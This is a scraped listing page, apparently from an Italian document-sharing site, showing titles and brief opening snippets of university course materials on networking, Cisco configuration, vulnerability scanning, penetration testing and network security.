Esame Laboratorio di Sistemi Operativi 2-01-2008 Il compito è costituito da domande chiuse e domande aperte. Non è consentito l uso di libri, manuali, appunti., etc. Tempo massimo 1 ora. Domande chiuse:
DettagliSicurezza dei sistemi e delle reti 1
Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2013/14 1 cba 2011 14 M.. Creative Commons Attribuzione Condividi allo stesso
DettagliAntonio Cianfrani. Introduzione A.A. 2015/2016
Antonio Cianfrani Introduzione A.A. 2015/2016 La rete Internet router sottoreti terminali Gli apparati di rete La pila protocollare TCP/IP Servizi Applicativi Trasporto (TCP/UDP) IP Interfaccia di sottorete
DettagliAntonio Cianfrani. Access Control List (ACL)
Antonio Cianfrani Access Control List (ACL) Indice Cosa sono le ACL? Configurare una ACL standard ACL extended Named ACL Restingere l accesso alle vty Cosa sono le ACL (1/3) Sono liste di condizioni applicate
DettagliVulnerability Assessment Installazione e configurazione di OpenVAS
Vulnerability Assessment Installazione e configurazione di OpenVAS Introduzione 1. Introduzione 2. Installazione di OpenVAS su VM Centos7 3. Esecuzione di network scan su un target di esempio 4. Valutazione
DettagliAttacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007 Sommario 1 Introduzione al Portscanning 2 3 Sommario 1 Introduzione al Portscanning 2 3 Sommario
DettagliAtlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: True DMZ Language: Italiano
Atlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: True DMZ Language: Italiano INTRODUZIONE Grazie a questa funzionalità è possibile creare una vera e propria
DettagliIN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052
IN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052 Grazie Per aver scelto un nostro prodotto INDICE Capitolo 1 Hardware ed alimentazione 1.1 Descrizione interfaccia 1.2 Alimentazione tramite adattatore PoE
DettagliAppello 13 Febbraio Tempo complessivo a disposizione per lo svolgimento: 2h Usare lo spazio dopo ogni Esercizio/Quesito per la risposta.
Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Appello 3 Febbraio 207 Tempo complessivo a disposizione per lo svolgimento: 2h Usare lo spazio dopo
DettagliWireshark (packet sniffer)
Wireshark (packet sniffer) Introduzione In computing, Wireshark (ex Ethereal) is a protocol analyzer, or "packet sniffer" application, used for network troubleshooting, analysis, software and protocol
DettagliMultigroup Chat in Python hosted on Raspberry PI. a cura di Raimondi Cominesi Simone & Voltolini Pietro
Multigroup Chat in Python hosted on Raspberry PI a cura di Raimondi Cominesi Simone & Voltolini Pietro 1 Indice Introduzione Settaggio impostazioni Raspberry o Abilitazione protocollo ssh o Abilitazione
DettagliSIMULAZIONE DI UN PENETRATION TEST (PENETRATION TESTING SIMULATION)
Over Security SIMULAZIONE DI UN PENETRATION TEST (PENETRATION TESTING SIMULATION) Sommario Viene presentata la simulazione di un attacco informatico, Penetration Testing, un metodo per valutare la sicurezza
DettagliAPI Socket di Berkeley
Laboratorio Reti di Calcolatori (A.A. 2008-2009) Programmazione di rete ed interfaccia API socket di Berkeley Delfina Malandrino delmal@dia.unisa.it http://www.dia.unisa.it/professori/delmal/ API Socket
DettagliConfigurazione delle interfacce di rete
Configurazione delle interfacce di rete A.A. 2006/2007 Alessandro Botticelli Instradamento dei datagrammi IP Routing : scelta del percorso su cui inviare i dati i router formano struttura interconnessa
DettagliIntroduzione al Networking
Introduzione al Networking Guida introduttiva alla configurazione di rete in ambiente GNU/Linux Valeria Mazzola mazzolavale1@gmail.com Corsi GNU/Linux Avanzati 2017 Valeria Mazzola Introduzione al Networking
DettagliCisco Internetwork Operating System. Introduzione
Cisco Internetwork Operating System Introduzione IOS e CLI IOS: marchio registrato, nome del sistema operativo presente sulla maggior parte dei router Cisco; presente anche su alcuni switch e su routing
Dettagli1 Concetti di base... 3
1. Concetti di base 2. Gli attacchi informatici 3. Sicurezza informatica 4. L'attività di Ethical Hacking Syllabus rev. 1.0 1 Concetti di base... 3 1.1 Concetti di base di sicurezza informatica... 3 1.1.1
Dettagli